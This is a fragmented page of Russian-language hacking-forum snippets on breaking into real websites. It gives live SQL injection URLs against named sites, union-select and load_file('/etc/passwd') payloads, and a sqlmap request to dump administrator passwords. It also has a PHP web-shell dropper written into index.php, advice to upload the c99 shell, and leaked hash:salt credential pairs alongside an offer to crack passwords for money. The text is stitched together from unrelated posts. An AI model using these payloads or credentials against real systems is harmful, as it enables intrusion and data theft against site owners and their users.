Separate names with a comma.
Можно блиндом получить http://hawk.ru/toto_stat_day.php?n_kogda=20120904%20and%20(select%20ord(substr(@@version,1,1))%20)=53 5.0.51-log
ничего,но надежда есть всегда. На сервере стоит форум Invision Power Board 3.4,попробуй в привате сплоит поискать...
ODk2MzE4MTgweryODI= 5$ за пароль
&cat[0]=1) union select table_name from information_schema.tables limit 0,1# и перебирай через limit пока свою таблицу не найдешь.
Тогда в базе поищи, например у Joomla в таблице jos_session и колонка data путь прописан
load_file('/etc/passwd') так иногда можно через скулю путь посмотреть
32fe45dbe62c4b706d0b90169454dd36:2rD||{0)91Jx7Tg4AFI;)hzC#P8lyr 4b2b02704c3baba8f2294c1298083946:<m]Ae@QrRgvn[%9LxK>d]F;,wJejZH...
44f994124c989e9d8345fd29c22c04b7:&C]\T(73?DozOQ!1\@UrFb)^5l/J$P a489f82731e5b8a621bcd93792e58cf2:^T*8~@$DOih"K%0Hm5Am2N$Aa@'ssm
5d111301c1ee9549850a173919ca3564:BX[FCL-XXY-=p*b&zsPp15}]=Prm++ //Будьте добры указать движок, с которого слит хэш, и привести его в...
It's all very simple...
Можно и без POST обойтись _http://clubpodium.ru/index.php?section=2&id=-320+union+select+1,2,3,version(),5,6+--+
Нет там уязвимости, откуда ты взял это?
Научи, как в Joomla залогониться при помощи хэша
нужно вывести username,password при помощи sqlmap, где usertype=Administrator...
Это можно сделать...
Так можешь вписать вверху index.php? <?php file_put_contents('lala.php', '<?php...
Попробуй с99 залить, возможно он будет работать
Так-то она есть GET /main.php HTTP/1.1 Host: www.golowar.ru X-Forwarded-For:...
